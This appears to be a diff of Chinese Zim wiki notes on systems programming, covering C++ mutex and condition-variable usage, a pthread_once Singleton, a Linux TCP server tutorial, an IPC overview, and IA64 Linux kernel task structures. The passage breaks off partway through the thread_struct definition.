如果一个 class 要包含 MutexLock 和 Condition,请注意它们的声明顺序和初始化顺序,mutex_ 应先于 condition_ 构造,并作为后者的构造参数:
|
||||
|
||||
class CountDownLatch
{
 public:
  CountDownLatch(int count)
    : count_(count),
      mutex_(),
      condition_(mutex_)
  { }

 private:
  int count_;
  MutexLock mutex_; // order matters: mutex_ must be declared before condition_
  Condition condition_;
};
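The class above shows only the constructor and members. A complete latch might look like the sketch below; the class name SimpleCountDownLatch and the wait/countDown/getCount methods are assumptions modelled on Java's CountDownLatch, and std::mutex / std::condition_variable stand in for MutexLock and Condition so the example is self-contained.

```cpp
#include <cassert>
#include <condition_variable>
#include <mutex>
#include <thread>

// Hypothetical latch: wait() blocks until countDown() has been called count times.
class SimpleCountDownLatch {
 public:
  explicit SimpleCountDownLatch(int count) : count_(count) {}

  void wait() {
    std::unique_lock<std::mutex> lock(mutex_);
    while (count_ > 0) {  // loop guards against spurious wake-ups
      condition_.wait(lock);
    }
  }

  void countDown() {
    std::lock_guard<std::mutex> lock(mutex_);
    if (count_ > 0 && --count_ == 0) {
      condition_.notify_all();  // wake every waiter once the count reaches zero
    }
  }

  int getCount() const {
    std::lock_guard<std::mutex> lock(mutex_);
    return count_;
  }

 private:
  mutable std::mutex mutex_;
  std::condition_variable condition_;
  int count_;
};
```

A typical use is a main thread that starts N workers and calls wait() until each of them has called countDown() after finishing its initialization.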
|
||||
|
||||
请允许我再次强调,虽然本节花了大量篇幅介绍如何正确使用 mutex 和 condition variable,但并不代表我鼓励到处使用它们。这两者都是非常底层的同步原语,主要用来实现更高级的并发编程工具,__一个多线程程序里如果大量使用 mutex 和 condition variable 来同步,基本跟用铅笔刀锯大树(孟岩语)没啥区别__。
|
||||
|
||||
===== 线程安全的 Singleton 实现 =====
|
||||
|
||||
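If you study the history of thread-safe Singleton implementations you will find many interesting things. At one point double-checked locking (DCL) was considered the way to go, combining efficiency and correctness. Later, experts pointed out that because of out-of-order execution DCL is unreliable. (This reminds me of SQL injection: ten years ago building SQL statements by string concatenation was common practice in web development, until one day someone exploited the hole to gain unauthorized access and modify a site's data; only then did people wake up and rush to patch.) Java developers are fairly lucky: they can rely on the loading of a static nested class. C++ has it worse: either lock on every access, or initialize eagerly, or bring out heavy weapons such as memory barriers. Then Java 5 revised its memory model and strengthened the semantics of volatile, so DCL (with volatile) became safe again. The C++ memory model, however, is still being revised, and C++ volatile currently cannot (and may never) guarantee the correctness of DCL (it works only on VS2005+).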
|
||||
|
||||
其实没那么麻烦,在实践中用 pthread once 就行:
|
||||
|
||||
#include <pthread.h>
#include <boost/noncopyable.hpp>

template<typename T>
class Singleton : boost::noncopyable
{
 public:
  static T& instance()
  {
    pthread_once(&ponce_, &Singleton::init);
    return *value_;
  }

  static void init()
  {
    value_ = new T();
  }

 private:
  static pthread_once_t ponce_;
  static T* value_;
};

template<typename T>
pthread_once_t Singleton<T>::ponce_ = PTHREAD_ONCE_INIT;

template<typename T>
T* Singleton<T>::value_ = NULL;
|
||||
|
||||
上面这个 Singleton 没有任何花哨的技巧,用 pthread_once_t 来保证 lazy-initialization 的线程安全。使用方法也很简单:
|
||||
|
||||
Foo& foo = Singleton<Foo>::instance();
|
||||
|
||||
当然,这个 Singleton 没有考虑对象的销毁,在服务器程序里,这不是一个问题,因为当程序退出的时候自然就释放所有资源了(前提是程序里不使用不能由操作系统自动关闭的资源,比如跨进程的 Mutex)。另外,这个 Singleton 只能调用默认构造函数,如果用户想要指定 T 的构造方式,我们可以用模板特化 (template specialization) 技术来提供一个定制点,这需要引入另一层间接。
|
||||
|
||||
Summary

* Prefer TCP sockets for inter-process communication
* The four principles of thread synchronization
* The idiomatic use of mutexes and condition variables; the key is RAII
|
||||
|
||||
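Used well, these few tools can handle essentially every situation in multithreaded server development, although some may feel that performance is not pushed to the limit. My view is: make the program correct first, then consider performance optimization, and this still holds for multithreading. Making a correct program fast is far easier than making a fast program correct.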
|
||||
|
||||
===== 7 总结 =====
|
||||
|
||||
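In today's multi-core world, threads are unavoidable. Multithreaded programming is an important personal skill and should not be instinctively rejected just because it is hard; software development today is many times harder than it was 10 or 20 years ago anyway. Only by mastering multithreaded programming can you choose rationally whether to use multiple threads, because you can estimate the difficulty and payoff of a multithreaded implementation and make the right choice at the start. Bear in mind that converting a single-threaded program to a multithreaded one is often harder than writing a multithreaded program from scratch.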
|
||||
|
||||
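Knowing the synchronization primitives and where each applies is a basic skill in multithreaded programming. In my experience, fluent use of the primitives mentioned in this article makes it fairly easy to write thread-safe programs. This article does not consider the effect of signals on multithreaded programming; Unix signals behave in complicated ways under multithreading and are generally shielded by the underlying network library (such as a Reactor) so that they do not interfere with application development.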
|
||||
|
||||
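Throughout, "efficiency" has not been my main concern: a) TCP is not the most efficient IPC; b) I advocate correct locking rather than writing your own lock-free algorithms (using atomic operations excepted). Strike a balance between program complexity and performance, and take into account the possibility of scaling up over the next two or three years (whether through faster CPUs, more cores, more machines, or network upgrades). The next article, "Anti-patterns of multithreaded programming", will examine common mistakes regarding scalability; I believe that in distributed systems, scalability deserves more effort than single-machine performance tuning.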
|
||||
|
||||
这篇文章记录了我目前对多线程编程的理解,用文中介绍的手法,我能解决自己面临的全部多线程编程任务。如果文章的观点与您不合,比如您使用了我没有推荐使用的技术或手法(共享内存、信号量等等),只要您理由充分,但行无妨。
|
||||
|
||||
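This article originally had two more sections, "Anti-patterns of multithreaded programming" and "Application scenarios for multithreading"; since the word count has already passed ten thousand, they are left for next time.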
|
||||
|
||||
===== 后文预览:Sleep 反模式 =====
|
||||
|
||||
我认为 sleep 只能出现在测试代码中,比如写单元测试的时候。(涉及时间的单元测试不那么好写,短的如一两秒钟可以用 sleep,长的如一小时一天得想其他办法,比如把算法提出来并把时间注入进去。)产品代码中线程的等待可分为两种:一种是无所事事的时候(要么等在 select/poll/epoll 上。要么等在 condition variable 上,等待 BlockingQueue /CountDownLatch 亦可归入此类),一种是等着进入临界区(等在 mutex 上)以便继续处理。在程序的正常执行中,如果需要等待一段时间,应该往 event loop 里注册一个 timer,然后在 timer 的回调函数里接着干活,因为线程是个珍贵的共享资源,不能轻易浪费。如果多线程的安全性和效率要靠代码主动调用 sleep 来保证,这是设计出了问题。等待一个事件发生,正确的做法是用 select 或 condition variable 或(更理想地)高层同步工具。当然,在 GUI 编程中会有主动让出 CPU 的做法,比如调用 sleep(0) 来实现 yield。
|
||||
118
Zim/Programme/APUE/套接字详解.txt
Normal file
@@ -0,0 +1,118 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-20T18:30:58+08:00
|
||||
|
||||
====== 套接字详解 ======
|
||||
Created Wednesday 20 April 2011
|
||||
http://edsionte.com/techblog/archives/2713
|
||||
Linux下的socket编程-服务器
|
||||
2011/03/15 by edsionte
|
||||
|
||||
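As we all know, processes on the same computer can communicate through IPC (inter-process communication) mechanisms, while processes running on different computers communicate through network IPC, that is, sockets. The socket API on Linux is based on BSD sockets; with this uniform API, network communication between processes is easy to implement. The socket API can be used both for connection-oriented (TCP) data transfer and for connectionless (UDP) data transfer. Communication generally follows the client/server model.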
|
||||
|
||||
本文以及下文将实现一个面向连接的C/S通信模型。本文首先介绍服务器端的实现。
|
||||
|
||||
1.创建套接字
|
||||
#include <sys/socket.h>
int socket(int domain, int type, int protocol);
|
||||
|
||||
通过socket函数可以创建一个套接字描述符,这个描述符类似文件描述符。通过这个套接字描述符就可以对服务器进行各种相关操作。
|
||||
|
||||
该函数包含三个参数,domain参数用于指定所创建套接字的协议类型。通常选用AF_INET,表示使用IPv4的TCP/IP协议;如果只在本机内进行进程间通信,则可以使用AF_UNIX。参数type用来指定套接字的类型,SOCK_STREAM用于创建一个TCP流的套接字,SOCK_DGRAM用于创建UDP数据报套接字。参数protocol通常取0。对于本文所描述的服务器,创建套接字的示例代码如下:
|
||||
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    printf("socket error!\n");
    exit(1);
}
|
||||
|
||||
2.绑定套接字
|
||||
|
||||
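A server's IP address and port number are generally fixed. The server's IP is the local IP, while the port number has to be specified explicitly. The bind function binds the server socket to a specified port.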
|
||||
|
||||
在具体介绍绑定函数之前,先说明一下socket中的套接字地址结构。由于套接字是通过IP地址和端口号来唯一确定的,因此socket提供了一种通用的套接字地址结构:
|
||||
struct sockaddr {
    sa_family_t sa_family;
    char sa_data[14];
};
|
||||
|
||||
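sa_family specifies the protocol family of the socket; for TCP/IP its value is AF_INET. sa_data stores the actual socket address. In practice, however, each protocol family has its own address format. For example, the socket address structure for the TCP/IP protocol family is: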
|
||||
struct sockaddr_in {
    short int sin_family;           /* Address family */
    unsigned short int sin_port;    /* Port number */
    struct in_addr sin_addr;        /* Internet address */
    unsigned char sin_zero[8];      /* Same size as struct sockaddr */
};

struct in_addr {
    uint32_t s_addr;                /* 32-bit IPv4 address in network byte order */
};
|
||||
|
||||
该地址结构和sockaddr结构均为16字节,因此通常在编写基于TCP/IP协议的网络程序时,使用sockaddr_in来设置具体地址,然后再通过强制类型转换为sockaddr类型。
|
||||
|
||||
绑定函数的函数原型如下:
|
||||
#include <sys/socket.h>
int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
|
||||
参数sockfd即服务器的套接字描述符;addr参数指定了将socket绑定到的本地地址;addrlen则为所使用的地址结构的长度。示例代码如下:
|
||||
memset(&my_addr, 0, sizeof(struct sockaddr_in));
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(SERV_PORT);
my_addr.sin_addr.s_addr = htonl(INADDR_ANY);

if (bind(sockfd, (struct sockaddr *)&my_addr,
         sizeof(struct sockaddr_in)) == -1) {
    printf("bind error!\n");
    exit(1);
}
|
||||
|
||||
注意在上述代码中,将IP地址设置为INADDR_ANY,这样就既适合单网卡的计算机又适合多网卡的计算机。
|
||||
|
||||
3.在套接字上监听
|
||||
|
||||
对于C/S模型来说,通常是客户端主动的对服务器端发送连接请求,服务器接收到请求后再具体进行处理。服务器只有调用了listen函数才能宣告自己可以接受客户端的连接请求,也就是说,服务器此时处于被动监听状态。listen函数的原型如下:
|
||||
#include <sys/socket.h>
int listen(int sockfd, int backlog);
|
||||
|
||||
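sockfd is the server's socket descriptor. backlog is a hint for the maximum length of the queue of pending connections that have not yet been accepted; it is not a limit on the total number of clients the server can serve. When that queue is full, further connection requests may be refused or ignored. Example: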
|
||||
#define BACKLOG 10
if (listen(sockfd, BACKLOG) == -1) {
    printf("listen error!\n");
    exit(1);
}
|
||||
|
||||
4.接受连接
|
||||
|
||||
listen函数只是将服务器套接字设置为等待客户端连接请求的状态,真正接受客户端连接请求的是accept函数:
|
||||
#include <sys/socket.h>
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
|
||||
|
||||
accept函数中所使用的参数都在上面的API中有所描述。accept函数执行成功后将返回一个代表客户端的套接字描述符,服务器进程通过该套接字描述符就可以与客户端进行数据交换。
|
||||
|
||||
5.数据传输
|
||||
|
||||
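Because sockets support several transport protocols, different protocols have different data transfer functions. The functions for sending and receiving data over TCP are: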
|
||||
#include <sys/types.h>
#include <sys/socket.h>
ssize_t send(int sockfd, const void *buf, size_t len, int flags);
ssize_t recv(int sockfd, void *buf, size_t len, int flags);
|
||||
|
||||
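As the prototypes show, the socket data transfer functions resemble the read/write functions for ordinary files, except that the first argument is a socket descriptor; buf is the data buffer, len is the length of the data to transfer, and flags is usually 0. Example: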
|
||||
while (1) {
    sin_size = sizeof(struct sockaddr_in);
    if ((client_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &sin_size)) == -1) {
        printf("accept error!\n");
        continue;
    }
    /*
     * Process the client's data here.
     */
}
|
||||
|
||||
如示例代码所示,通过while循环使得服务器对客户端进行持续监听。如果客户端有连接请求则新建一个代表客户端的套接字描述符,进而进行对客户端数据的接受和发送。
|
||||
|
||||
上述的几个函数属于网络编程中最基本的也是最关键的几个API,依次通过上述的方法就可以完成服务器端的程序的编写,具体的过程还可以参考下图:
|
||||
|
||||
正如上图所示,在处理完客户端的数据传输请求后,必须通过close函数关闭客户端的连接。
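Putting the five steps together, a minimal echo server might look like the sketch below. It is an illustration under assumptions rather than the original article's code: the function names makeListener and echoOneClient are hypothetical, the listener binds to the loopback address instead of INADDR_ANY, and it serves a single client before returning.

```cpp
#include <arpa/inet.h>
#include <cassert>
#include <cstdint>
#include <cstring>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

// Steps 1-3: create, bind, listen. Port 0 lets the kernel pick a free port;
// the port actually used is stored in *boundPort. Returns -1 on failure.
int makeListener(uint16_t port, uint16_t* boundPort) {
  const int fd = socket(AF_INET, SOCK_STREAM, 0);
  if (fd == -1) return -1;
  sockaddr_in addr;
  std::memset(&addr, 0, sizeof addr);
  addr.sin_family = AF_INET;
  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
  socklen_t len = sizeof addr;
  if (bind(fd, reinterpret_cast<sockaddr*>(&addr), sizeof addr) == -1 ||
      listen(fd, 10) == -1 ||
      getsockname(fd, reinterpret_cast<sockaddr*>(&addr), &len) == -1) {
    close(fd);
    return -1;
  }
  *boundPort = ntohs(addr.sin_port);
  return fd;
}

// Steps 4-5: accept one client, echo everything back until the client
// stops sending, then close the connection.
bool echoOneClient(int listenFd) {
  const int clientFd = accept(listenFd, NULL, NULL);
  if (clientFd == -1) return false;
  char buf[1024];
  ssize_t n;
  while ((n = recv(clientFd, buf, sizeof buf, 0)) > 0) {
    ssize_t sent = 0;
    while (sent < n) {  // send() may write fewer bytes than requested
      const ssize_t w = send(clientFd, buf + sent, n - sent, 0);
      if (w <= 0) {
        close(clientFd);
        return false;
      }
      sent += w;
    }
  }
  close(clientFd);  // always close the per-client descriptor
  return n == 0;    // 0 means the peer closed its side cleanly
}
```

A real server would call echoOneClient (or its equivalent) inside the accept loop and would usually hand each client to a thread, a child process, or an event loop.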
|
||||
{{./server-86x300.jpg}}
|
||||
BIN
Zim/Programme/APUE/套接字详解/server-86x300.jpg
Normal file
|
After Width: | Height: | Size: 11 KiB |
51
Zim/Programme/APUE/深刻理解Linux进程间通信(IPC).txt
Normal file
@@ -0,0 +1,51 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-08-23T00:58:04+08:00
|
||||
|
||||
====== 深刻理解Linux进程间通信(IPC) ======
|
||||
Created Tuesday 23 August 2011
|
||||
深刻理解Linux进程间通信(IPC)
|
||||
|
||||
郑彦兴 (mlinux@163.com)国防科大计算机学院
|
||||
|
||||
简介: 一个大型的应用系统,往往需要众多进程协作,进程(Linux进程概念见附1)间通信的重要性显而易见。本系列文章阐述了Linux环境下的几种主要进程间通信手段,并针对每个通信手段关键技术环节给出详细实例。为达到阐明问题的目的,本文还对某些通信手段的内部实现机制进行了分析。
|
||||
|
||||
序
|
||||
|
||||
linux下的进程通信手段基本上是从Unix平台上的进程通信手段继承而来的。而对Unix发展做出重大贡献的两大主力AT&T的贝尔实验室及BSD(加州大学伯克利分校的伯克利软件发布中心)在进程间通信方面的侧重点有所不同。前者对Unix早期的进程间通信手段进行了系统的改进和扩充,形成了“system V IPC”,通信进程局限在单个计算机内;后者则跳过了该限制,形成了基于套接口(socket)的进程间通信机制。Linux则把两者继承了下来,如图示:
|
||||
{{./1.gif}}
|
||||
|
||||
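Of these, the original Unix IPC mechanisms are pipes, FIFOs, and signals; System V IPC comprises System V message queues, System V semaphores, and System V shared memory; POSIX IPC comprises POSIX message queues, POSIX semaphores, and POSIX shared memory. Two points deserve a brief note: 1) Because of the many Unix variants, the Institute of Electrical and Electronics Engineers (IEEE) developed an independent Unix standard, known as the Portable Operating System Interface (POSIX). Most existing Unix and popular versions follow the POSIX standard, and Linux has followed it from the beginning; 2) BSD did address IPC within a single machine as well (sockets themselves can be used for it). In fact, single-machine IPC in many Unix versions bears traces of BSD, such as the anonymous memory mapping supported by 4.4BSD and the reliable signal semantics implemented in 4.3+BSD.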
|
||||
|
||||
图一给出了linux 所支持的各种IPC手段,在本文接下来的讨论中,为了避免概念上的混淆,在尽可能少提及Unix的各个版本的情况下,所有问题的讨论最终都会归结到Linux环境下的进程间通信上来。并且,对于Linux所支持通信手段的不同实现版本(如对于共享内存来说,有Posix共享内存区以及System V共享内存区两个实现版本),将主要介绍Posix API。
|
||||
|
||||
linux下进程间通信的几种主要手段简介:
|
||||
|
||||
管道(Pipe)及有名管道(named pipe):管道可用于具有亲缘关系进程间的通信,有名管道克服了管道没有名字的限制,因此,除具有管道所具有的功能外,它还允许无亲缘关系进程间的通信;
|
||||
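Signal: signals are a relatively complex means of communication, used to notify the receiving process that some event has occurred; besides inter-process communication, a process can also send signals to itself. In addition to the early Unix signal function signal, Linux supports sigaction, whose semantics conform to the POSIX.1 standard (in fact this function comes from BSD; to provide reliable signals while keeping a uniform external interface, BSD reimplemented signal on top of sigaction);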
|
||||
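Message queue: a message queue is a linked list of messages; there are POSIX message queues and System V message queues. A process with sufficient permission can add messages to the queue, and a process granted read permission can take messages off it. Message queues overcome the shortcomings that signals carry little information and that pipes carry only unformatted byte streams with a limited buffer size.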
|
||||
共享内存:使得多个进程可以访问同一块内存空间,是最快的可用IPC形式。是针对其他通信机制运行效率较低而设计的。往往与其它通信机制,如信号量结合使用,来达到进程间的同步及互斥。
|
||||
信号量(semaphore):主要作为进程间以及同一进程不同线程之间的同步手段。
|
||||
套接口(Socket):更为一般的进程间通信机制,可用于不同机器之间的进程间通信。起初是由Unix系统的BSD分支开发出来的,但现在一般可以移植到其它类Unix系统上:Linux和System V的变种都支持套接字。
|
||||
|
||||
下面将对上述通信机制做具体阐述。
|
||||
|
||||
附1:参考文献[2]中对linux环境下的进程进行了概括说明:
|
||||
|
||||
一般来说,linux下的进程包含以下几个关键要素:
|
||||
|
||||
有一段可执行程序;
|
||||
有专用的系统堆栈空间;
|
||||
内核中有它的控制块(进程控制块),描述进程所占用的资源,这样,进程才能接受内核的调度;
|
||||
具有独立的存储空间
|
||||
|
||||
进程和线程有时候并不完全区分,而往往根据上下文理解其含义。
|
||||
|
||||
参考资料
|
||||
|
||||
UNIX环境高级编程,作者:W.Richard Stevens,译者:尤晋元等,机械工业出版社。具有丰富的编程实例,以及关键函数伴随Unix的发展历程。
|
||||
|
||||
linux内核源代码情景分析(上、下),毛德操、胡希明著,浙江大学出版社,提供了对linux内核非常好的分析,同时,对一些关键概念的背景进行了详细的说明。
|
||||
|
||||
UNIX网络编程第二卷:进程间通信,作者:W.Richard Stevens,译者:杨继张,清华大学出版社。一本比较全面阐述Unix环境下进程间通信的书(没有信号和套接口,套接口在第一卷中)。
|
||||
|
||||
BIN
Zim/Programme/APUE/深刻理解Linux进程间通信(IPC)/1.gif
Normal file
|
After Width: | Height: | Size: 3.6 KiB |
1322
Zim/Programme/APUE/网络编程指南.txt
Normal file
268
Zim/Programme/APUE/进程和线程.txt
Normal file
@@ -0,0 +1,268 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-20T17:07:31+08:00
|
||||
|
||||
====== 进程和线程 ======
|
||||
Created Wednesday 20 April 2011
|
||||
http://bbs.chinaunix.net/thread-2289758-1-3.html
|
||||
进程在OS中是一个非常关键的抽象概念。
|
||||
在OS中虚拟CPU称为执行线程,简称为线程。
|
||||
用于创建和管理多执行线程的实用工具通常包含在一个pthread库。因为该库中接口是按照POSIX标准定义的,所以以p开头。
|
||||
|
||||
在UNIX Os中,单线程进程和多线程进程模型如下:
|
||||
见帖子最下面 图1
|
||||
{{./1.jpg}}
|
||||
在linux中,单线程任务和多线程任务组模型如下:
|
||||
见帖子最下面 图2
|
||||
{{./2.jpg}}
|
||||
在linux Os中,用“任务”替代“进程”,而没有“进程”这个对象。
|
||||
用数据结构task_struct来描述任务,任务就相当于UNIX OS中的进程。 每一个任务都有任务地址空间(相当于UNIX OS中的进程地址空间),但一个任务中只有一个线程。通过“任务组”这个概念来实现多线程任务(相当于UNIX中的多线程进程)。
|
||||
|
||||
可以这样简单地说:“Linux的任务是UNIX单线程进程的对等体”。
|
||||
|
||||
用于描述任务的数据结构task_struct,是一个信息量非常大的数据结构。但是并不是每一个线程都会有完整的task_struct成员,而只是保留了需要的成员变量值。在多线程的任务组中,每个线程都有一个task_struct数据结构来描述线程所在的任务。但是所有的线程都共享所在任务组的资源和相关信息,所以这些副本是一种浪费。实际上,并不是这么糟糕,大多数任务的成员变量是一些单独的对象,共享这些对象的线程,仅仅保存了对它的引用。
|
||||
|
||||
在linux操作系统中,定义了一个指向当前任务的指针current
|
||||
在单处理器中,任何时刻只有一个任务在执行,current指针指向的任务在执行,current是一个全局变量。
|
||||
在多处理器中,在同一时刻可以有多个任务在执行,那么在OS中可以看到的每个CPU上(也就是“执行线程”)有一个current指针,并且都是局部变量。
|
||||
由于current使用地过于频繁,OS都把current申明为寄存器变量。在IA64平台下,通用寄存器r13用来保存current指针。
|
||||
/*
|
||||
* In kernel mode, thread pointer (r13) is used to point to the current task
|
||||
* structure.
|
||||
*/
|
||||
#define _IA64_REG_TP 1037 /* R13 */
|
||||
#define current ((struct task_struct *) ia64_getreg(_IA64_REG_TP))
|
||||
|
||||
创建任务
|
||||
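In Linux, creating a task (that is, creating a process or thread, except that Linux has no separate process concept: tasks replace processes, every task is single-threaded, and a multithreaded task is called a task group) differs by architecture. Here we discuss only the implementation on IA64.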
|
||||
在linux Os中没有提供用于创建原始线程的函数,因为除了系统启动的初始线程外(即PID为0的线程),任何一个线程都是从原有的线程上复制过来的而产生的。
|
||||
通过copy_thread函数创建新的线程。
|
||||
int copy_thread (int nr, unsigned long clone_flags,
|
||||
unsigned long user_stack_base, unsigned long user_stack_size,
|
||||
struct task_struct *p, struct pt_regs *regs)
|
||||
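In Linux this function is wrapped by copy_process (which creates a task), which in turn is wrapped by do_fork (creates a task) and fork_idle (creates the idle task, also called the idle process or idle thread); do_fork is in turn wrapped by the system call sys_fork.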
|
||||
|
||||
内核创建新的任务步骤:
|
||||
1、为新任务分配内存:在内核内存空间分配一块连续的内存用于保存task_struct、thread_struct(和平台相关,一般几个字节到大于1KB不等)、内核堆栈。
|
||||
2、初始化任务结构(task_struct),但还没有初始化thread_struct。
|
||||
3、初始化thread_struct
|
||||
4、完成初始化task_struct中剩余的与平台无关的部分
|
||||
5、将新创建的任务添加到运行队列中,这就可以运行了
|
||||
|
||||
task_struct分成两个部分:平台无关的部分和平台特定部分(线程结构)。
|
||||
在创建任务过程中涉及到几个非常重要的数据结构:pt_regs、switch_stack、thread_struct等
|
||||
|
||||
pt_regs结构:
|
||||
这个结构封装了需要在内核入口中保存的最少的状态信息。比如说每一次的系统调用、中断、陷阱、故障时,pt_regs结构中保存了最少的状态信息。该结构中主要保存了必要的scratch类型的寄存器。(在现代IA64架构中还有3类寄存器:scratch寄存器、保持寄存器、专用寄存器)。在每一次的系统调用、中断、陷阱、故障发生时,依次会发生下列事件:
|
||||
1、在内核堆栈上为pt_regs结构分配内存
|
||||
2、在pt_regs结构中保存scratch寄存器
|
||||
3、调用了适当的内核处理器(执行系统调用内部处理、中断处理程序等)
|
||||
4、从pt_regs中恢复scratch寄存器
|
||||
5、从内核堆栈中释放pt_regs占用的内存
|
||||
应该保持pt_regs尽可能的小,可以提高性能。
|
||||
在IA64平台的Linux中pt_regs定义如下:
|
||||
struct pt_regs {
|
||||
/* The following registers are saved by SAVE_MIN: */
|
||||
unsigned long b6; /* scratch */
|
||||
unsigned long b7; /* scratch */
|
||||
|
||||
unsigned long ar_csd; /* used by cmp8xchg16 (scratch) */
|
||||
unsigned long ar_ssd; /* reserved for future use (scratch) */
|
||||
|
||||
unsigned long r8; /* scratch (return value register 0) */
|
||||
unsigned long r9; /* scratch (return value register 1) */
|
||||
unsigned long r10; /* scratch (return value register 2) */
|
||||
unsigned long r11; /* scratch (return value register 3) */
|
||||
|
||||
unsigned long cr_ipsr; /* interrupted task's psr */
|
||||
unsigned long cr_iip; /* interrupted task's instruction pointer */
|
||||
/*
|
||||
* interrupted task's function state; if bit 63 is cleared, it
|
||||
* contains syscall's ar.pfs.pfm:
|
||||
*/
|
||||
unsigned long cr_ifs;
|
||||
|
||||
unsigned long ar_unat; /* interrupted task's NaT register (preserved) */
|
||||
unsigned long ar_pfs; /* prev function state */
|
||||
unsigned long ar_rsc; /* RSE configuration */
|
||||
/* The following two are valid only if cr_ipsr.cpl > 0 || ti->flags & _TIF_MCA_INIT */
|
||||
unsigned long ar_rnat; /* RSE NaT */
|
||||
unsigned long ar_bspstore; /* RSE bspstore */
|
||||
|
||||
unsigned long pr; /* 64 predicate registers (1 bit each) */
|
||||
unsigned long b0; /* return pointer (bp) */
|
||||
unsigned long loadrs; /* size of dirty partition << 16 */
|
||||
|
||||
unsigned long r1; /* the gp pointer */
|
||||
unsigned long r12; /* interrupted task's memory stack pointer */
|
||||
unsigned long r13; /* thread pointer */
|
||||
|
||||
unsigned long ar_fpsr; /* floating point status (preserved) */
|
||||
unsigned long r15; /* scratch */
|
||||
|
||||
/* The remaining registers are NOT saved for system calls. */
|
||||
|
||||
unsigned long r14; /* scratch */
|
||||
unsigned long r2; /* scratch */
|
||||
unsigned long r3; /* scratch */
|
||||
|
||||
/* The following registers are saved by SAVE_REST: */
|
||||
unsigned long r16; /* scratch */
|
||||
unsigned long r17; /* scratch */
|
||||
unsigned long r18; /* scratch */
|
||||
unsigned long r19; /* scratch */
|
||||
unsigned long r20; /* scratch */
|
||||
unsigned long r21; /* scratch */
|
||||
unsigned long r22; /* scratch */
|
||||
unsigned long r23; /* scratch */
|
||||
unsigned long r24; /* scratch */
|
||||
unsigned long r25; /* scratch */
|
||||
unsigned long r26; /* scratch */
|
||||
unsigned long r27; /* scratch */
|
||||
unsigned long r28; /* scratch */
|
||||
unsigned long r29; /* scratch */
|
||||
unsigned long r30; /* scratch */
|
||||
unsigned long r31; /* scratch */
|
||||
|
||||
unsigned long ar_ccv; /* compare/exchange value (scratch) */
|
||||
|
||||
/*
|
||||
* Floating point registers that the kernel considers scratch:
|
||||
*/
|
||||
struct ia64_fpreg f6; /* scratch */
|
||||
struct ia64_fpreg f7; /* scratch */
|
||||
struct ia64_fpreg f8; /* scratch */
|
||||
struct ia64_fpreg f9; /* scratch */
|
||||
struct ia64_fpreg f10; /* scratch */
|
||||
struct ia64_fpreg f11; /* scratch */
|
||||
};
|
||||
switch_stack结构:
|
||||
该结构用在内核将执行一个线程切换到另一个线程之时,该结构主要保存了保持寄存器。pt_regs和switch_stack结合起来,一起封装了每个线程正确运行所需的最低限度的机器状态。这种机器状态称为高度管理状态(eagerly managed state),与松散管理状态(lazily managed state)相对。
|
||||
简单地说switch_stack保存了任务切换的上下文,主要保存了保持寄存器。
|
||||
在IA64架构的linux中,switch_stack定义如下:
|
||||
struct switch_stack {
    unsigned long caller_unat;  /* user NaT collection register (preserved) */
    unsigned long ar_fpsr;      /* floating-point status register */

    struct ia64_fpreg f2;       /* preserved */
    struct ia64_fpreg f3;       /* preserved */
    struct ia64_fpreg f4;       /* preserved */
    struct ia64_fpreg f5;       /* preserved */

    struct ia64_fpreg f12;      /* scratch, but untouched by kernel */
    struct ia64_fpreg f13;      /* scratch, but untouched by kernel */
    struct ia64_fpreg f14;      /* scratch, but untouched by kernel */
    struct ia64_fpreg f15;      /* scratch, but untouched by kernel */
    struct ia64_fpreg f16;      /* preserved */
    struct ia64_fpreg f17;      /* preserved */
    struct ia64_fpreg f18;      /* preserved */
    struct ia64_fpreg f19;      /* preserved */
    struct ia64_fpreg f20;      /* preserved */
    struct ia64_fpreg f21;      /* preserved */
    struct ia64_fpreg f22;      /* preserved */
    struct ia64_fpreg f23;      /* preserved */
    struct ia64_fpreg f24;      /* preserved */
    struct ia64_fpreg f25;      /* preserved */
    struct ia64_fpreg f26;      /* preserved */
    struct ia64_fpreg f27;      /* preserved */
    struct ia64_fpreg f28;      /* preserved */
    struct ia64_fpreg f29;      /* preserved */
    struct ia64_fpreg f30;      /* preserved */
    struct ia64_fpreg f31;      /* preserved */

    unsigned long r4;           /* preserved */
    unsigned long r5;           /* preserved */
    unsigned long r6;           /* preserved */
    unsigned long r7;           /* preserved */

    unsigned long b0;           /* so we can force a direct return in copy_thread */
    unsigned long b1;
    unsigned long b2;
    unsigned long b3;
    unsigned long b4;
    unsigned long b5;

    unsigned long ar_pfs;       /* previous function state */
    unsigned long ar_lc;        /* loop counter (preserved) */
    unsigned long ar_unat;      /* NaT bits for r4-r7 */
    unsigned long ar_rnat;      /* RSE NaT collection register */
    unsigned long ar_bspstore;  /* RSE dirty base (preserved) */
    unsigned long pr;           /* 64 predicate registers (1 bit each) */
};

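thread_struct structure:

This structure encapsulates the lazily managed state; most importantly, it holds the kernel stack pointer ksp, which points to the task's switch_stack. Lazily managed state is not switched on every context switch; it is switched only when the new state is actually needed. Switching lazily managed state is much slower than switching eagerly managed state, so the kernel avoids it wherever possible to improve performance.
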
struct thread_struct {
    __u32 flags;                /* various thread flags (see IA64_THREAD_*) */
    /* writing on_ustack is performance-critical, so it's worth spending 8 bits on it... */
    __u8 on_ustack;             /* executing on user-stacks? */
    __u8 pad[3];
    __u64 ksp;                  /* kernel stack pointer */
    __u64 map_base;             /* base address for get_unmapped_area() */
    __u64 task_size;            /* limit for task size */
    __u64 rbs_bot;              /* the base address for the RBS */
    int last_fph_cpu;           /* CPU that may hold the contents of f32-f127 */

#ifdef CONFIG_IA32_SUPPORT
    __u64 eflag;                /* IA32 EFLAGS reg */
    __u64 fsr;                  /* IA32 floating pt status reg */
    __u64 fcr;                  /* IA32 floating pt control reg */
    __u64 fir;                  /* IA32 fp except. instr. reg */
    __u64 fdr;                  /* IA32 fp except. data reg */
